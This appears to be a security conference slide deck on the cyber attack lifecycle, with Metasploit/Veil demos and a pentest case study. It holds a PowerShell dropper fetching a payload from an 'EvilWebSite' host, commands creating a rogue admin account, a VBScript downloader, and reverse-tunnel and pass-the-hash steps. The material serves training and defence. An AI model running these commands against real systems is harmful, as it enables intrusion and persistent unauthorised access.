Agenda
• Objectives
• Introduction
• Cyber Attack Lifecycle
• Vulnerabilities and Exploitation
• Example of a penetration test scenario
• Conclusion
Objectives
Get insights on the methodologies used during a Cyber Attack
Understand how hackers penetrate a network, elevate their privileges, maintain persistence and hide their malicious activities
Show hands-on:
Provide a concrete example using Metasploit tool
Show a Demo in real time
Deep dive into a real life pentesting exercise
Understand what can be done to protect against cyber attacks
Introduction
Frédéric De Pauw
Co-Founder / Offensive Security @Avanguard
Ethical Hacker
Head IT Security @Ethias
Freelance Ethical Hacker (BE – LUX – US)
https://be.linkedin.com/in/fdepauw
Introduction
What is Cyber Crime?
Computer crime, or cybercrime, is crime that involves a computer and a network
Two types of Cyber Crime:
Technology is the Target. Enterprise, State systems, personal systems
Technology is the Instrument. Criminal activities on Internet
This session is focused on the first type
Introduction
Technology = Target Technology = instrument
Distributed Deny of Service Pedopornography
Hacking incitement to racial hatred
Malwares, Ransomwares Incitement to terrorism
Phishing Money Laundering
Hacktivism Drug sell
… Spam
…
Introduction Cyber Crime
Drastically evolved over the past years, following the global evolution of ICT supporting human activity
Allow cyber criminals to make profit equivalent as other types of criminality
Offers some advantages over other criminal activities: anonymity, discretion, borderless
Remain little fought and with no international legislation
Has evolved to cyber war with state-sponsored attacks
Will affect our life (connected cars, Operational Technologies, IOT)
Cost of Cyber Crime in Belgium: 3,5 billion Euros
Introduction
• Evolution of Cyber Crime
SOPHISTICATION
1985-1995
EntertainmentFirst Worms
Phone Hacking
2010-2016-…
HacktivismVirus Spread
Website Defacement
Organized CrimeDDOS
Company Systems HackingData Lead
Industrial espionage
Cyber WarTargeted Attacks
State-Sponsored Attacks
Introduction
Future of Cyber Crime
Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)
Predominance of Advanced Persistence Threats targeting the end user
Intensification of cyber war / cyber espionage activities between nations
Increase of cyber crime targeting connected objects and operational technologies
Hacking of a plane - 2015
Hacking of a pacemaker - 2013
Cars hacking - 2015
Introduction
Legal evolution
General Data Protection Regulation (GDPR) – adopted end of 2016 –comes into force 25 may 2018
Circulars of National Bank of Belgium
Regulation for financial sector
Data Breach notification standard
Within 72 hours
Fines in case of data leak
Max 4% of turnover, maximum 20 M€
Cyber Attack Lifecycle
- Public Information- Social Networks- Vulnerability Scanning- Physical Observation
1 Reconnaissance 2 Initial Infection
- Vulnerabilities- Virus / Malware- Social Engineering- Physical Intrusion
3 Gain Control 4 Privilege Escalation
Control infected system
5 Lateral Movement
Compromise more systems deeper in the network
7 Malicious Activities
Data ExfiltrationHacking WebsitesMoney Extortion
..Gain elevated privileges on the infected system
6 Persistence
Maintain persistent connection with infected systems
Cyber Attack Lifecycle> Reconnaissance
Reconnaissance process is a key activity
Indeed, during this phase crucial information are obtained in order to perform a cyber attack
For instance, information will be used to determined the best attack vector to be used
Activities performed are:
Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information
Collect information through direct contact sur as phone calls (fake poll, job seeker..)
Collect technical information concerning the target information system (exposed systems, partners, data centers..)
Collect information on premises (garbage, WIFI scanning..)
Actively scan enterprise networks exposed on Internet
Cyber Attack Lifecycle> Reconnaissance
Commercial Tool: MaltegoFree Tools (Kali Linux): • recon-ng• DMItry• theharvester
Cyber Attack Lifecycle > Reconnaissance
Following reconnaissance activities, attackers must have obtained enough information in order to determine best attack vectors in order to perform the initial infection phase
For instance:
Vulnerabilities infecting systems exposed on Internet
Lack of physical access to facilities
Social engineering attack on selected profiles from, for instance, social networks information
Cyber Attack Lifecycle> Initial Infection
Initial Infection is aimed at obtaining a first backdoor within the target information system
Vectors:
Exploiting a vulnerability affecting the victim’s system(s)
Infection through Virus / Malware
Exploiting a physical vulnerability
Installing rogue access points or devices
Cyber Attack Lifecycle > Initial Infection
PerimeterPublic Cloud
Private Cloud Corporate Network
On Prem ApplicationsServers / AppliancesSecurity Technology
SAAS ApplicationsServers / AppliancesSecurity Technology
Corporate ApplicationsServers / AppliancesSecurity Technology
Corporate ApplicationsServers / AppliancesSecurity TechnologyEnd Users
Cyber Attack Lifecycle > Initial Infection
Lan Turtle from Hakshop
https://youtu.be/l8YpTOv7Q2A
Cyber Attack Lifecycle > Initial Infection IDS/IPS Bypass
Encryption
Anti-Virus Bypass
Use simple Powershell as a dropper which fetches an encrypted payload over Internet
powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt '))
Unknown Viruses
Use Staging to decouple payload from initial dropper.
The dropper is injected directly into memory
Firewall Bypass
Uses “reverse” connections which connect to the C&C
E.g. HTTPS passing through the Enterprise Proxy
Cyber Attack Lifecycle > Initial Infection
Free tool for malware code obfuscation
VEIL Evasion Framework
Generate obfuscated payload using several methodologies
Metasploit Meterpreter payloads
Generate payloads from different sources
C/C++ shellcode
Powershell shellcode
Python shellcode
Cyber Attack Lifecycle> Initial Infection
Metasploit + Veil framework
Create a Meterpreter backdoor obfuscated with VEIL
Powershell type
Cyber Attack Lifecycle> Initial Infection
Metasploit + VEIL Framework
Create a Meterpreter backdoor using VEIL for Antivirus Avoidance
Embed the Virus in a Word Macro, or create a .bat, include payload or fetch the payload on a Web Server
Cyber Attack Lifecycle > Gain Control
Once initial infection is performed, the objective is to get control over the machine.
For this a network connection must be established between the victim and the Command & Control Server
In general « reverse » connection is made to bypass inbound Firewall protection
Several techniques to bypass Outbound filtering (if present.)
Cyber Attack Lifecycle > Gain Control
Standard Enterprise security principles for Outbound filtering:
Default policy is to deny all outbound connections
Allowed outbound connections must go through a proxy
Outbound connections must conform to the expected protocol
Outbound connections must pass other checks as well.
Outbound filtering evasion techniques examples
Reverse HTTP and / or HTTPS traffic (without or with Proxy settings verification
Payload Staging over DNS by setting the payload into TXT Records of a Domain
Cyber Attack Lifecycle > Gain Control
Metasploit / Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Cyber Attack Lifecycle > Privilege Escalation
Escalate privileges from infected machines in order gain elevated access
Typical example is getting Administrator or System privileges
Several techniques
« Local Exploits » from local applications on the infected machine
Manual search for credentials in scripts
Password Hashes dump (e.g. SAM, /etc/passwd) and cracking
Authenticated Sessions grabbing (e.g. VPN Sessions)
SSH Keys
World Writeable files
Read command history files
Batches / Jobs alteration
Process Injection
Try injecting malicious code in processes running under « Domain Admin » privileged user
Cyber Attack Lifecycle > Privilege Escalation
Metasploit: « Incognito » module
Allows to impersonate authentication tokens on compromised windows hosts
Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens
TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
Cyber Attack Lifecycle > Lateral Movement
From Infected systems, try to infect more systems deeper in the Network
Basically repeat the cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)
Aim for high value systems, windows domain controllers, file servers..
Techniques
Credential re-use / pass-the-hash / SSH keys re-use
Internal applications vulnerabilities (less often patched)
Network segmentation issues between environments ( e.g. Port 445) – PsExec with Pass-The-Hash
Cyber Attack Lifecycle > Lateral Movement
Metasploit – Pivoting technique
Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems
Cyber Attack Lifecycle > Lateral Movement
Metasploit – Pivoting technique
Use Autoroute to make the compromised host a pivot to other networks
Cyber Attack Lifecycle > Lateral Movement
Metasploit – Pivoting technique
Scan the network through the route created on ports 139 & 445
Cyber Attack Lifecycle > Lateral Movement
Metasploit – Pivoting technique
Start a new session on a new host using PsExec and “Pass-The-Hash” technique re-using local Administrator password hash
Cyber Attack Lifecycle > Maintain Persistence
Prevent loss of connection between infected machines and the C&C
Techniques
Create jobs / schedule tasks
Create service running on startup
Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
Bootkit / Rootkit
Default file association
Logon Scripts
Modification of Applications / Services
Registry RUN keys
Cyber Attack Lifecycle > Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the compromised host boots
Cyber Attack Lifecycle > Maintain Persistence
Metasploit / Persistence module
Create a Meterpreter service which will start when the compromised host boots
Cyber Attack Lifecycle > Demo
Social Engineering scenario
Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance
Undetected by up to date commercial antivirus
1. Prepare Malware & environment
2. Send Malware
3. Execute Malware
4. Get infected & Contact C&C
5. Interact
Vulnerabilities and Exploitation A vulnerability is a flaw in a system which allows a malicious user to compromise its
Confidentiality, Integrity and / or its availability
Simple – Default Password. Complex – Buffer Overflow in an application
Dozens of new vulnerabilities officially classified everyday
http://www.cvedetails.com
Dozen of others are not disclosed!
0DAY – Vulnerabilities not discovered, or not disclosed
Vulnerabilities are discovered by
Researchers, students (Ethical Hackers)
Professional researchers ( Vulnerability Brokers )
http://www.zerodayinitiative.com/
France- Vupen Security – Sells vulnerabilities to NASA
Cyber Criminals( 0DAYS )
Vulnerabilities and Exploitation Full Disclosure principle
Vulnerabilities are reported and published publicly as soon as discovered without taking into account that a patch is available
Responsible disclosure principle
Vendors are notified first
Vulnerability is publicly disclosed after 45 days
Websites with vulnerabilities and associated exploits
www.securityfocus.com
www.1337day.com (not free)
http://www.cvedetails.com/
http://www.exploit-db.com/
Underground Websites on TOR network
Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR) ccc.de (ALL), blackhat.com (US)
Vulnerabilities and Exploitation Complexity of systems, applicative codes, communication flows, network
segmentation
Out-of-the-box vulnerabilities of Vendor solutions, lack of security configuration
Next->Next->Next Syndrome
Lack of secure coding awareness
TOP 10 OWASP
Lack of enforcement for Security during IT Projects
Security implies Cost and Time
Need for functionality <-> Need for security
BlackList Mode
Learning Mode
Penetration test example
• Context: Black Box Intrusion test. Scope: External-facing systems
Web Servers
Ports 80 (HTTP) et 443 (HTTPS)
DMZ Intranet
Domaine Windows d’EntrepriseInternal Network
Penetration test example
• VULN 1/2: Vulnerable deployment of SAP BO ( Apache Axis2 )• CVE-2010-0219 , Apache Axis2 Default Credentials
• http://www.securityfocus.com/bid/40343 , Apache Axis2 Directory traversal
• See earlier:• Vuln « Directory Traversal »
• Vuln « Default Password »
• Allows to have admin credentials to Axis2
Penetration test example
• Access to Axis2 administration allows to upload a Web Service and hot deployment of it
Penetration test example
• A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects Authenticated Code Execution
• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
• We use it to deploy a reverse shell backdoor on the server to connect back to port 80
• VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443
Web Servers
Ports 80 (HTTP) et 443 (HTTPS)
DMZ Intranet
Domaine Windows d’Entreprise
C&C SERVER – PORT 80
Port 80
Internal Network
Penetration test example
• Not possible to upload a meterpreter (killed by AV on the machine)
• Possible to upload a backdoor which sends me back a DOS command prompt on the server
Penetration test example
• Next steps:
• Create privileged account on the server• VULN 4: Application server is running under ADMIN privileges
• Net user temptest password /add
• Net localgroup Administrators hacked /add
• Obtain a Remote Desktop connection • Problem: Port 3389 closed Inbound
• Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port 443
Penetration test example
• To create the tunnel, I need to download a SSH Client on the Server using DOS command prompt
• I create a VBSCRIPT script using « Echo » command, then execute the VBSCRIPT
• Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
• Cscript dl.vbs
• Use plink to create the tunnel
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", "http://www.putty.com/plink.exe", FalsexHttp.Send
with bStrm.type = 1 '//binary.open.write xHttp.responseBody.savetofile "c:\temp\plink.exe", 2 '//overwrite
end with
Penetration test example
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port 443
Connect to RDP through the tunnel and use the user account I just created to connect
temptest password
Penetration test example
Next Step -> Lateral Movement – the simplest first, credentials reuse
I need to crack all passwords present locally on the infected server
Vuln 6/7: Windows 2003 Design Vulnerabilities
VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH
VULN: LMHASH encryption algorithm is broken and can be cracked easily
Penetration test example
VULN 8: Local Administrator password is replicated over all systems in the DMZ
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port 443 Web Servers
Web Servers
Web Servers
Port 3389
Penetration test example
Next-Step: Try to hit Internal Network
VULN 9 : DMZ Systems members of Internal Windows Domain. Means that critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal network
VULN 10 : Password Replication Bis – A Domain Admin user account whose name is identical has a local account has the same password
Penetration test example
I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and has full control over the Enterprise Domain
Web Servers
Ports 80 (HTTP) et 443 (HTTPS)
DMZ Intranet
Domaine Windows d’Entreprise
Contrôleur de Domaine
Domain Controller
Conclusion
Cyber Crime will continue to be a major threat for enterprises for the next years
Computer Vulnerabilities will continue to be discovered and will continue to affect enterprises
Legacy technologies such as standard AV are no longer sufficient to protect against cyber threats
Operational IT Security programs must address security incident response and must address each of the following:
Awareness
Preventive security
Detective security
Corrective security
Conclusion
[Personal Statement] Be careful with the notion of Risk-Based Security, based on asset classification
Should less critical systems be given less attention in terms of security?
If a Hacker can compromise a system in non critical zone and obtain credentials that are re-used in other zones? If the enterprise does not have one Windows Domain per Risk Domain?
Use Risk-Based security only if you have a full IT isolation… even thou is that enough?
Awareness
Educate all your employees to emergent cyber threats
Make real social-engineering exercises, with sending undetected Viruses to your employees
Be careful to human reaction
Educate but also protect colleagues who will be infected during the exercise
Conclusion
Preventive Security
Sandboxing technologies must be implemented in parallel with standard signature-based AV to protect against APTs
Implement NAC
Identify your vulnerabilities before the hackers
Network security must be governed: network segmentation policies, firewall rules governance, flow and application control, inbound and outbound traffic policies..
High Privileges Management
Isolation of network tiers
Use hardening best practices
E.g. Remove admin rights from end users and from applications (least privilege)
Implement correct Windows security settings
Conclusion
Detective security
Real-time correlation of technical use cases has a real added-value
Monitor for accounts creation on any system
Monitor any “Domain Admin” privilege elevation
Monitor for internal scans
Monitor authentication failures
Monitor denied outbound traffic
Corrective Security
Have emergency security procedures for containment defined and tested
Have a security incident response plan
Have a patching policy